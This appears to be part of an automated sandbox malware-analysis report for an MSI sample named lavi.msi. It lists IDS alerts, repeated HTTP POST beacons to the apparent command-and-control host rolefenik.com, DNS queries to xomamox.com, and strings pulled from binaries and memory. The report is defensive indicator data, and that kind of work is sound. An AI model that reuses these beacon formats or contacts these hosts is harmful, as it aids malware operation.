            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58097 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58103 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58107 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58098 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58086 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58088 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58110 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58109 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58114 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58094 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58104 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58090 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58092 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58105 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58111 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58095 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49706
            Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:58082
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1lHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 92 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1nHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1mHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1hHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1gHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1jHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1iHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1tHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1sHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kC6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kCqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kCaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kCKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kD6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kDqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kDaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kDKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kA6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1kAqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1nC6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1nCqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1nCaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1nCKEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1nD6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1nDqEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1nDaEofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA== | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 0 | Cache-Control: no-cache
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BE5078 InternetReadFile,11_2_02BE5078
            Source: global traffic | DNS traffic detected: DNS query: xomamox.com
            Source: global traffic | DNS traffic detected: DNS query: rolefenik.com
            Source: unknown | HTTP traffic detected: POST /test/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | Cookie: FKbPpAITwn1lHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: rolefenik.com | Content-Length: 92 | Cache-Control: no-cache
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3076305289.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866404374.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3076305289.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866404374.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3076305289.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866404374.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: explorer.exe, 0000000B.00000002.3895491206.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289118490.0000000004405000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobeS
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3076305289.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866404374.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://ocsp.digicert.com0O
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.i.lencr.org/0
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.o.lencr.org0#
            Source: explorer.exe, 0000000B.00000002.3898266932.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3898287903.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3894546786.0000000002C80000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | String found in binary or memory: http://t2.symcb.com0
